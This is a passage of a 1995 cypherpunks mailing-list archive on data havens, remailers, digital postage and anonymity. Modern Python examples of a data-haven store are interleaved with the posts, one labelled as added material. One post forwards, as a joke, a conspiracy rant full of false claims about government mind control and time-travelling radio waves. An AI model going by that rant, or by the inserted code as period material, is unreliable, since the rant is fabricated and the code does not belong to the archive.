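            ok = False
        if not ok:
            raise PermissionError(f"{action} refused by policy")

    def store(self, requester, data):
        self._permit(requester, "store", len(data))
        self._next += 1
        handle = f"obj-{self._next:06d}"
        self._blobs[handle] = bytes(data)
        return handle

    def fetch(self, requester, handle):
        self._permit(requester, "fetch", 0)
        return self._blobs[handle]


if __name__ == "__main__":
    haven = Haven(AccessListPolicy(["alice@example.org"]))   # constructed identity
    handle = haven.store("alice@example.org", b"first file")
    # A new operator policy is a one-line change; Haven itself is untouched.
    haven.policy = AllOf(AccessListPolicy(["alice@example.org"]), SizeCapPolicy(1024))
    print(handle, haven.fetch("alice@example.org", handle))
```
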




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RGRIFFITH@sfasu.edu
Date: Mon, 9 Jan 95 07:32:20 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <01HLMZ1MIHOM000TCU@TITAN.SFASU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>At 09:45 AM 1/3/95 -0800, Hal wrote:
>> ... As I wrote, banks are
>>required to get SS#'s for depositors right now, and I wouldn't expect
>>that to change any time soon.  If anything, the trend appears to be
>>towards more tightening rather than less.  ...
>
>Isn't that only a requirement on interest-bearing, or potentially 
>interest-bearing, accounts?  
>
>    --Paul J. Ste. Marie
>      pstemari@well.sf.ca.us, pstemari@erinet.com
>
Yes, but  the account form will have a place for it anyway and the account
opening person will demand it.  My experience a few years ago was that
I had to go to an officer and point out that the account was not interest 
bearing and so the SS# was not required in order to get the account
opened without it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 07:37:40 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Data Haven problems
In-Reply-To: <Pine.HPP.3.91.950109114625.16546A-100000@cor.sos.sll.se>
Message-ID: <Pine.3.89.9501090902.A6205-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, Mats Bergstrom wrote:

> Hardly. (*.gi0 and *.jp0 for a start?)
> But what are data havens for, if not for controversial data?
> One of the greatest needs, if not _the_ greatest, in our times
> for a data haven is probably for storing porno. There is a
> tremendous, world-wide demand for porno. Yet, there are numerous
> countries where sex.gif's found on your disk (encrypted or not,
> they can use thumb-screws to force the key out of your hands)
> will put you in a very difficult situation (loss of social
> status, jail, decapitation). It might be much more convenient
> for, let's say, a Saudi teenager to store his encrypted private
> gif's in a data haven in Sweden, download them when he feels
> the urge and purge the copies after every use.

My feelings exactly.

Are we going to fall prey to the media's assault on porno and resort to 
self-censorship?  If a data haven resorted to filtering out all gifs and 
jpegs, or even porno, then it wouldn't be one; I wouldn't use it for my 
porn, nor for my other data.  If it is going to be a datahaven it can't 
fall to such things as filtering data for controversial subject the owner 
doesn't like.


i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Mon, 9 Jan 95 07:45:17 PST
To: dfloyd@io.com
Subject: Re: Data Haven problems
In-Reply-To: <199501071710.LAA21334@pentagon.io.com>
Message-ID: <199501091546.AA19741@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Any ideas on how to guard against mailbombs, and to confirm to the sender
> that their files are stored successfully?  Perhaps do a mailing with
> a test command that validates the existence of the file, and sends a
> reply back whether the file is okay or not, or would this result in a
> possible security hole?

To solve problem #1, use digital postage of some form. Digicash, FV,
Tacky Tokens, Mountain Dew futures... just require a per-storage-unit
charge _to initially check in the file_. You can of course charge for
storage over time, too.

To solve problem #2, send an MD5 hash of the file back to the sender.
Ideally, you would also provide (in perl, C source, csh, or whatever)
a submission script which outputs an MD5 hash before the file is sent.
As long as the before-sending hash matches the hash returned by the
haven, you can assume that the file is intact.

> Lastly, instead of postage (like a remailer would get), how hard would it
> be to implement "rent" where if the "rent" is not paid, and a grace period
> has elapsed the file would be trashed.  All this while preserving the
> anonymity of the sender and the data haven site.

Not very. Use a dbm database to map "rent due" dates by file, then
periodically sweep through the database.

> As to the code, this will have to be my second rewrite as I am going to
> do it in perl code, rather than C...  last rewrite was from a daemon to
> a program activated by a .forward file.

Perl has the nice property of being fairly portable, too.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
		  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxFaRafb4pLe9tolAQH3EwQAmokOebOJtSbny7rAphWBE7n38XvWYbwy
SMFXmctU6DNnM+9oGTtlaROTUy2jbbt6zDf1/1wIOG/p0C6K7BAD8lt0mkrf4OqN
As1yf9JLxtTHgYIKF94aUiGiqCUo5zWe12CB+GwZ9LKma4BxXKqT3iCYrjQL+2Su
us2wL5AVRd4=
=McPN
-----END PGP SIGNATURE-----
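The hash receipt and the rent sweep suggested in the message above, as an added example that is not part of the original post or of any data haven code. It substitutes SHA-256 for the MD5 the message names and uses Python's dbm.dumb as the dbm database; the class name, method names and time values are hypothetical.

```python
import dbm.dumb
import hashlib
import hmac
import os


def digest(data):
    """Content hash used both as the storage handle and as the receipt."""
    return hashlib.sha256(data).hexdigest()


def receipt_matches(local_data, receipt):
    """Sender side: compare the hash computed before sending with the haven's reply."""
    return hmac.compare_digest(digest(local_data), receipt)


class RentedStore:
    """Files on disk plus a dbm map of handle -> 'rent paid until' (epoch seconds)."""

    def __init__(self, directory, grace_s=7 * 86400):
        self.directory = directory
        self.grace_s = grace_s
        self.rent = dbm.dumb.open(os.path.join(directory, "rent"), "c")

    def _path(self, handle):
        return os.path.join(self.directory, handle)

    def check_in(self, data, paid_until):
        handle = digest(data)
        with open(self._path(handle), "wb") as fh:
            fh.write(data)
        # Hash what actually landed on disk, so a short or corrupted write
        # yields a receipt that will not match the sender's own hash.
        with open(self._path(handle), "rb") as fh:
            receipt = digest(fh.read())
        self.rent[handle] = str(int(paid_until))
        return receipt

    def pay(self, handle, paid_until):
        if handle not in self.rent:
            raise KeyError(handle)
        self.rent[handle] = str(int(paid_until))

    def sweep(self, now):
        """Trash every file whose rent date plus the grace period has passed."""
        expired = [k.decode() for k in self.rent.keys()
                   if int(self.rent[k]) + self.grace_s < now]
        for handle in expired:
            if os.path.exists(self._path(handle)):
                os.remove(self._path(handle))
            del self.rent[handle]
        return sorted(expired)

    def close(self):
        self.rent.close()


if __name__ == "__main__":
    import tempfile
    store = RentedStore(tempfile.mkdtemp(), grace_s=100)
    receipt = store.check_in(b"constructed sample file", paid_until=1000)
    print(receipt_matches(b"constructed sample file", receipt))
    print(store.sweep(now=1101))
    store.close()
```

A matching receipt shows the haven received the bytes intact at check-in; it says nothing about whether the file is still held later. The rent database is keyed by content hash only, so it records no sender identity.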




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Mon, 9 Jan 95 09:54:33 PST
To: cypherpunks@toad.com
Subject: Rumored CBS "hit" on internet coming
Message-ID: <199501091755.JAA10056@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


This may be old news or it could be bogus but fyi anyway:


>From parsons@bga.com Mon Jan  9 05:16:49 1995
>From: Brad Parsons <parsons@bga.com>
>Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd)
>To: bdolan@well.sf.ca.us
>
>
>Brad, Could you forward this to the cypherpunks list?  Thanks.--BJP
>
>---------- Forwarded message ----------
>Date: Mon, 9 Jan 1995 03:48:01 -0600 (CST)
>Subject: CBS/C.Chung Plan Hit Job on Internet?
>
>A friend tells me that CBS and Connie Chung plan a hit job on Internet
>on the evening news today, 1/9/95.  Apparently it may be in the context 
>of youths supposedly learning how to make bombs from online info.  In 
>case I don't get to watch it, could somebody make it a point to watch 
>it and give us a summary of the report.  Thanks.


Reply, if you're inclined, via e-mail.  I'm off the list until the Carol 
Ann stuff dies out.    - Brad Dolan,  bdolan@well.sf.ca.us








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 9 Jan 95 07:09:57 PST
To: perry@imsi.com
Subject: Re: Vinge's True Email name ?
Message-ID: <199501091510.AA16373@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


>Lou Poppler says:
>> I knew that old compuserve account was good for something.
>> They list Vinge, Vernor  San Diego CA   72267.2656@compuserve.com
>

Of course, he might have used his true name because he wanted to
hear from people. Tom Clancy seems to enjoy the newsgroup created
to discuss his books and he posts there regularly. Many people
strive to become famous because they love the adulation of the fans. 
Others don't. Who knows about VV? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Garcia <agarcia@Starbase.NeoSoft.COM>
Date: Mon, 9 Jan 95 08:27:41 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501091510.AA16373@access3.digex.net>
Message-ID: <199501091628.KAA00456@Starbase.NeoSoft.COM>
MIME-Version: 1.0
Content-Type: text/plain


As Wei Dai pointed out, the hostname of Vernor Vinge's office
workstation at San Diego State University can be easily determined in
about 5 minutes of poking about.  (He appears to have about 10-15
shells running at any given time...)

I really enjoy his work.  However, I've never sent him any email.
The general impression I've gotten is that he prefers not to receive
fan email, since it distracts him from important work.

If you *really* want to send him fan mail, I recommend sending it in
paper form to his publisher.  First, this allows him to better handle
fan mail in batches.  Second, this gives his publisher some indication
of interest in his work, and maybe gets him a better deal on his next
book.

-Anthony Garcia
agarcia@neosoft.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 9 Jan 95 08:28:01 PST
To: carolann@mm.com
Subject: Re: Remailer Abuse
Message-ID: <9501091624.AA05922@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


What lists did you post to?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com (Dave Del Torto)
Date: Mon, 9 Jan 95 11:48:43 PST
To: cypherpunks@toad.com
Subject: HUMOR:...and we thought _PRZ_ had troubles!
Message-ID: <ab368f82000210037e1d@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


My apologies for this non-crypto posting, but I just _couldn't_ resist
sharing. Ironically (incredulously?), paranoia does nothing to improve
one's grasp of adjectives and adverbs... Anyway, please, please restrict
your replies (if any) to private email amongst yourselves and don't follow
my poor example and post anything more about it to the list.

BTW..."Half" street?!

    dave
____________________________________
 "Fascinating, Captain." -Mr. Spock

 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Newsgroups: alt.alien.visitors
Subject: Truth or Paranoia?
From: doctor.doom@citylink.uu.holonet.net
Date: Fri, 6 Jan 95 21:56:00 EST
I found the following disturbing post on a BBS in the Washington DC area:

Msg #  48 of  83                 Date: Fri 12-03-93,  6:29 pm
From: UNIT                       Read: 7 times  [1 Reply]

Forwarded From: 1900 Half Street, SW
Subject: important

The story I am about to relate may seem incredulous in many ways even
though it is true and I solemnly attest that it is true despite the fact
that it seems incredulous in many ways there is verifiable evidence and i
urge you to verify the evidence on your own if you should find this
incredulous which is the natural response.   I am a victim of government
sponsored terrorism and racism sponsored by the us government and big
corporations which actually work HAND IN HAND with the us government towards
these ends.  This of course includes the liberal media although some cells
of independence remain and not all individual journalists are accessories to
the conspiracy.  Suffice it to say that democracy does not in any way exist
in the United States of AmeriKKKa.   The government has been out to get me
ever since I was born in 1966 as a result of a specific genetic coding
abnormality which makes me unique among the 99.9999 th percentile of the
American population and makes people like me marked for harassment.  The
abnormality may have been spawned by mass CIA mind control tests conducted
in 1961, which affected certain birth patterns. They actually have
attempted to cause me to try to kill myself on several occasions and have
attempted to drive me crazy by chemical and psychological means including
retroactive radio control from the future (any scientist will tell you that
radio waves which move faster than light speed are capable of moving
backwards in time and thus controlling the past). The constant chemical
assaults on my well being mean I cannot leave my apartment except in dire
circumstances and then I must breathe through a gas mask.  Not only that
but people are strategically placed at all places I interact with people
out of necessity (I cannot avoid such encounters entirely) to make me self
aware and paranoid.  These efforts are futile and I continue to defy the
Amerikkkan government.   On June 11 1986 they deliberately influenced me by
radio to be present at the intersection of Sherman Avenue and Harvard
Street NW at precisely 1:42 am and I had to cross seven blocks of territory
that had been sealed by the police.   This is documented.  I witnessed
seven police forces engaged in a shootout that lasted three hours.   The
police forces were shooting at EACH OTHER and I counted at least thirty
verifiable casualties.  Although this has never made the newspapers due to
the government/corporate conspiracy the information is readily obtainable
but must be sought through FOIA requests at the FBI.   The files are
disguised as traffic fatalities and the true cause of death is not noted.
Also documentable is my genetic trait which Johns Hopkins in Baltimore will
provide upon demand.   I am considered a threat to the CIA because of my
superior evolutionary status and my radical thoughts.   In 1971 the United
States abandoned the Bretton Woods system of fixed exchange rates and
secretly implemented a dual currency system along with ruling elites from
other major countries including the USSR and Red China. I know this because
agents have tried to buy me off with this currency which exists solely in
the form of informational transactions and has no physical manifestations
yet makes a mockery of the valueless Dollar.   I am a man of integrity and
I refused to participate in this plot.   Needless to say the federal
deficit is measured in dollars and is therefore nonexistent and irrelevant.
 The secret currency system is solvent. In 1987 the Wall Street Journal
documented the cataclysmic stock market crash but made no mention of the
real underlying factors behind it, which again represented a government
conspiracy.  After I wrote to the Wall Street Journal to point this out,
attempts to kill me trebled.   There are also listening devices implanted
everywhere to monitor my actions and junk mail sorted with DMSO and curare
arrives daily.  I remove the mail with tweezers and leave it on the counter
for the mailman as unreturnable.  He wears gloves of course. The only
reason I am still alive is because I persist in making my case public at
every opportunity, which means the government does not directly try to kill
me but relies on third-party means which I have so far avoided. A rental
car I obtained in Sausalito in 1989 was irradiated with depleted uranium
which increased the total mass of the car by 33% and would have caused me to
go over a cliff were it not for the normal precaution I take of always
driving 15 mph under the speed limit. But it is this kind of insidiousness
which I am constantly faced with.   I also can only cross the street in
crosswalks so that any attempt to kill me with a vehicle could not be
blamed on pedestrian error.  The only reason I am still alive is because I
persist in making my case public at every opportunity, which means the
government will not try to kill me directly, since that would verify my
claims instantly in the public's eyes.   For that reason I urge all of you
to write to the media, contact your senators, and do everything you can to
let the conspirators know  that my story has been heard, and that the eyes
of the public are upon the conspiracy.  It is only through concerted
collective action that I can remain alive and the AmeriKKKan government
which has been ruling illegitimately since a secret coup in 1947 (documented
at the Library of Congress) can be brought down and freedom restored.

-end?-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@c2.org>
Date: Mon, 9 Jan 95 11:32:46 PST
To: alt.privacy.anon-server@demon.co.uk
Subject: Re: Remailer source
In-Reply-To: <199412301935.AA22766@von-neumann.info.polymtl.ca>
Message-ID: <199501091929.LAA22433@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Octavian  Ureche <tavi@info.polymtl.ca> wrote:

> Does anybody know where could I find UNIX sources
> for a remailer ?

ftp cs.cmu.edu /afs/andrew.cmu.edu/usr12/mg5n/public/remailer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 9 Jan 95 11:47:52 PST
To: cypherpunks@toad.com
Subject: Experiments and Toys vs. the Real Thing
Message-ID: <199501091946.LAA06410@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



The debate about data havens and what they ought to really be, what
they ought to really accept, etc., is similar to debates about what
digital money ought to be, how remailers ought to operate, etc.

It's useful to categorize projects as "experimental" (or "toy," with
no negative connotations implied) or "commercial" (or "real," I
suppose):

* EXPERIMENTAL, or TOY: Early efforts, meant to help illuminate the
issues, uncover problems, gain knowledge, educate people, etc.

* COMMERCIAL, or REAL: More robust, well-established. Usually "for
pay," and expected to be maintained, available, professionally
operated.

Now there's a fuzzy distinction between these, a continuum, really.
For example, PGP began life (esp. as v. 1.0) as an amateur or
experimental thing, with a few hacker experimentalists playing with
it. Version 2.x has been usable as a commercial tool, every bit as
good as "MailSafe," the ostensibly commercial RSADSI tool. The user
community has added enough capability and hooks to clearly put PGP in
the COMMERCIAL category: robust, supported, etc.

Remailers are _almost_ in the second category, especially when taken
as an ecological whole. (That is, any single remailer may be
flaky--though many aren't--but the pinging and reputation tools that
support the ecology make the ensemble more robust and usable.) Many of
us believe that "digital postage" paid remailing will be the final
step needed to move remailers into the commercial/real category.
Until then, they're not businesses--they're hobbies and experiments.

(Which is fine, as one of the main reasons for Cypherpunks was to take
the academic papers presented at Crypto conferences and reify them in
working code, as experiments.)

Digital cash is more clearly still at the experimental level, as are
anonymous markets (like BlackNet), data havens, and so forth.

Why do I mention these points? Because there's a danger in "premature
professionalization." And a danger in criticizing experimental or toy
efforts for not being "pure enough."

The recent claims that nascent "data havens" _must_ support all files,
including hard-core porn, weapons secrets, etc. seems to be an example
of this. I'm not for censorship, just concerned that the data haven
_experiments_ are not secure enough, not robust enough, to actually
carry high-visibility files.

For example, data havens will clearly someday be used to carry defense
secrets, troop movements, weapons manufacturing details, etc. But I
would not want to carry them on my "experimental data haven," for
obvious reasons. Even if I only carried "non-American" secrets, such
as reports on Russian troop maneuvers around Grozny, I could expect
visits from American officials (to stop me, to plant data they want
planted, etc.). 

(And let's not forget "snatch teams" that grab foreign nationals
suspected of crimes...Israel, Iraq, Iran, and the U.S. have grabbed
people in other countries. And more common is simple execution. If a
Swedish data haven carried files related to U.S. operations, and the
data haven location was known--part of what I mean by saying the
enabling technologies do not yet exist--then various measures would be
applied. Diplomatic, equipment sabotage, even killing the operators.
I'm not being Ludlumesque here...clearly such "threats to national
security" would be seen as justifying various reactions. Especially to
send a message to other potential operators.)

Those advocating a "purist" (= professional/real) approach to data
havens, seen recently in the calls for data havens to never screen
files or accesses, should bear in mind that "data haven technology" is
lacking. Remailer chains leading in and out of data havens are still
non-robust, subject to attacks and compromises. And of course, digital
cash is still being thrashed out.

An experimental data haven that allowed unscreened access or
depositing of information would also become a magnet for kooks, for
those wishing to sabotage such havens, etc. If truly serious
information was found on the haven, huge efforts would be mounted to
find the source, get the site shut down, etc. Current remailer
technology is just not up to the challenge. (I'm not saying it won't
someday be, just not now.)

Criticizing experimental data havens for "not going all the way" seems
to me to be wrong-headed. First, there's the usual issue of who bears
the risk, with those not at risk urging others to put themselves and
their sites at risk by being "pure." Second, and more important, the
enabling technologies for data havens are just not yet themselves
available and robust.

A data haven that carries "Four Horsemen of the Infocalypse" material
will come under strong attack, legal, cryptographic, and physical.

There's a place for experimental or toy implementations, e.g., data
havens that operate in some limited domain. This allows the issues to
get explored before full-scale attacks are mounted. Think of it as a
training exercise, a drill, or an immunization.

--Tim May, who thinks the first real data havens will come under
intense attack and so had better be secure from the start

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 9 Jan 95 11:56:00 PST
To: bdolan@well.sf.ca.us (Brad Dolan)
Subject: Re: Rumored CBS "hit" on internet coming
In-Reply-To: <199501091755.JAA10056@well.sf.ca.us>
Message-ID: <199501091955.LAA07671@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> >Subject: CBS/C.Chung Plan Hit Job on Internet?
> >
> >A friend tells me that CBS and Connie Chung plan a hit job on Internet
> >on the evening news today, 1/9/95.  Apparently it may be in the context 
> >of youths supposedly learning how to make bombs from online info.  In 
> >case I don't get to watch it, could somebody make it a point to watch 
> >it and give us a summary of the report.  Thanks.

Argghh!! When Connie interviewed me last week, she said I could
_whisper_ some dark uses to her and it would just be between the two
of us!

Life's a bitch, and so is Connie.

> Reply, if you're inclined, via e-mail.  I'm off the list until the Carol 
> Ann stuff dies out.    - Brad Dolan,  bdolan@well.sf.ca.us

It seems to have gone through the "Newbie-nova" (a double newism?)
phase and is already dropping exponentially.

(By Newbie-nova I mean the spate of initial posts. I know the
syndrome, as I made several posts on my first day on "Cyberia.")

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 9 Jan 95 09:01:00 PST
To: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
Subject: Re: BofA+Netscape
In-Reply-To: <y960wc1w165w@voxbox.norden1.com>
Message-ID: <9501091655.AA24435@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
    Date: Tue, 13 Dec 94 11:27:45 EST
    
    Rick Busdiecker <rfb@lehman.com> writes:
    
    >     Even Apple & Microsoft agree that Netscape is brain dead...
    
Please be more careful in your attributions.

The extent to which I wrote the above comment is that I quoted it from
someone else's article.

			Rick

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxFqg5NR+/jb2ZlNAQFRbwP/cPEMxF4aSfGPyi7gbudxG6NGUtNl9Ted
hsCDzg4KLb1jRTtwt66c6R+W8Qd1ekZw6kv9qbCu/xiIDNI4DG0Z9VUyt4a4+EdE
v45i5An70yLUS6wd7ncicH4Rxoo4KxU2fOwe5PZWzBAWHWRQA8zOB8pbpbwZcg6Q
BCkf6Q6jGTc=
=ngk4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Mon, 9 Jan 95 03:07:59 PST
To: cypherpunks@toad.com
Subject: Re: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
Message-ID: <Pine.HPP.3.91.950109114625.16546A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


wcs@anchor.ho.att.com wrote:

> Filtering by filename and type can also be useful - if you don't allow
> files named *.gif and *.jpg, users may be less likely to
> spam you with pornography.

Hardly. (*.gi0 and *.jp0 for a start?)
But what are data havens for, if not for controversial data?
One of the greatest needs, if not _the_ greatest, in our times
for a data haven is probably for storing porno. There is a
tremendous, world-wide demand for porno. Yet, there are numerous
countries where sex.gif's found on your disk (encrypted or not,
they can use thumb-screws to force the key out of your hands)
will put you in a very difficult situation (loss of social
status, jail, decapitation). It might be much more convenient
for, let's say, a Saudi teenager to store his encrypted private
gif's in a data haven in Sweden, download them when he feels
the urge and purge the copies after every use.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 9 Jan 95 15:32:00 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501091628.KAA00456@Starbase.NeoSoft.COM>
Message-ID: <gWP4lyczB8x1075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501091628.KAA00456@Starbase.NeoSoft.COM>, you wrote:

> If you *really* want to send him fan mail, I recommend sending it in
> paper form to his publisher.  First, this allows him to better handle
> fan mail in batches.  Second, this gives his publisher some indication
> of interest in his work, and maybe gets him a better deal on his next
> book.

And if you *really* want to send Vernor Vinge fan mail, and you *can't*
*stand* the notion of sending it via snailmail, you can send email to
his publisher: pnh@tor.com .  That's the email address for Patrick
Nielsen Hayden, senior editor at Tor Books.  Patrick will know what to
do with it.  (n.b.: I don't think Patrick is actually Vinge's editor; I
think [but am not sure] that Vinge's editor is Jim Frenkel, who oddly
enough is married to Vernor Vinge's ex-wife, Joan Vinge.)

(Cypherpunks Duncan Frissell and Sandy Sandfort may recall Patrick from
his salad days in San Francisco, when he was part of the crew which took
over FREEDOM TODAY and FREE MARKET REPORTER magazines in 1978.)

                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLxGaoeVevBgtmhnpAQFYxQL+JqH6lhYdbhZ5uxaQS8G6dnvtLAZEt49b
Ye/jJG1xpQGqsLu1wV3pCPDvo+/MUHF6dX8Jt/VaSy4aAkFz3dqm3n9btjWBwvpt
LHQjBqwg70PAyiiJ9/MdYj9pUCeurFqr
=5A8z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 9 Jan 95 13:08:54 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: for-pay remailers and FV
In-Reply-To: <199501070231.SAA20999@largo.remailer.net>
Message-ID: <Pine.SUN.3.91.950109130413.5497B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

> . . . a remailer consortium would do best to issue a local banknote
> usable only by themselves and have customers settle with the
> consortium issuer, rather than any member of the consortium itself.
> If the consortium issuer were to use blind sigs, the consortium
> members wouldn't be able to ascertain who paid.
> 
> The mechanism for settlement could be credit cards directly, mailed in
> checks, even FV.  The preferences of the consortium members for issues
> of timeliness of settlement, reversibility, loss sharing, etc. would
> decide the actual choice of settlement mechanism.
> . . .

Gee, this sounds awfully familiar.  Maybe Eric will have more
luck in getting you remailer folks to listen.  I hardly got so
much as a peep when I suggested that a remailers' guild create
or authorize one or more digital stamp issuers.

Damn, I hate being so far ahead of my time.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nissim@acs.bu.edu
Date: Mon, 9 Jan 95 10:51:09 PST
To: cypherpunks@toad.com
Subject: positive publicity for anonymity
Message-ID: <199501091843.NAA112415@acs.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I've just posted a proposal to alt.config for a new group

	alt.temping

I'm hoping that temporary workers will use this as a forum to
compare and contrast temp agencies, wage differences, 'permanent
hire penalties' etc.

There are about 4.4 million business service temps in the US.  Wage
differentials are noticeable - one agency will pay $2.00 more than
another; this means $320/month to a temp worker.

I expect temps to use anonymous posting capabilities to compare
wage rates and company patterns *anonymously* because they may fear
discrimination from their agencies. (I know I would)

This seems like a very positive use of anonymity.  Not only will
millions of people on the bottom rung of office life be able to
gain advantage by information, there are clear parallels to
areas in the past of the left where unions and workers rights
were seen as causes of first importance.  

In fact, the troubles involved in being temporary have been championed
several times on television.  This might make a good counterargument
to 'teenagers and pipe bombs'.  If we say anonymity is a tool that
helps up to 3-4% of the work force make intelligent choices and get
paid more we may key into the left wing slant of the media.

Treon Verdery
(not posting from Adam's account this time!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 9 Jan 95 15:21:38 PST
To: dfloyd@io.com
Subject: Re: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
Message-ID: <ZwQ4lyczBSQA075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9501090448.AA14477@anchor.ho.att.com>, you wrote:

> Filtering by filename and type can also be useful - if you don't allow
> files named *.gif and *.jpg, users may be less likely to
> spam you with pornography.  Namespace control in general is an issue -
> do users get to choose filenames, or list directories, or do they
> have to know the names of files to retrieve. 
> Another issue is whether files can only be retrieved by the sender -
> probably a local policy issue.  

Pornographic images aren't spam _per_se._ What makes them troublesome is
the huge number of people who wish to download them when their
availability is widely known.  (My ISP's ftp site is being bogged down
by lots of accesses; it is speculated that these are people trying to
access pornography kept there.)

The obvious fix here is the same as the proposed fix for remailer
spamming:  charge for access.

As a (presumably) fixed-location data haven, one would want to be able
to use some kind of anonymous e-money for payment, but one could also
use good, old-fashioned credit card numbers, too.

The feelthy peexture business might well be the cash cow that keeps a
data-haven/fortress remailer afloat (if that's not too mixed a metaphor).

                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

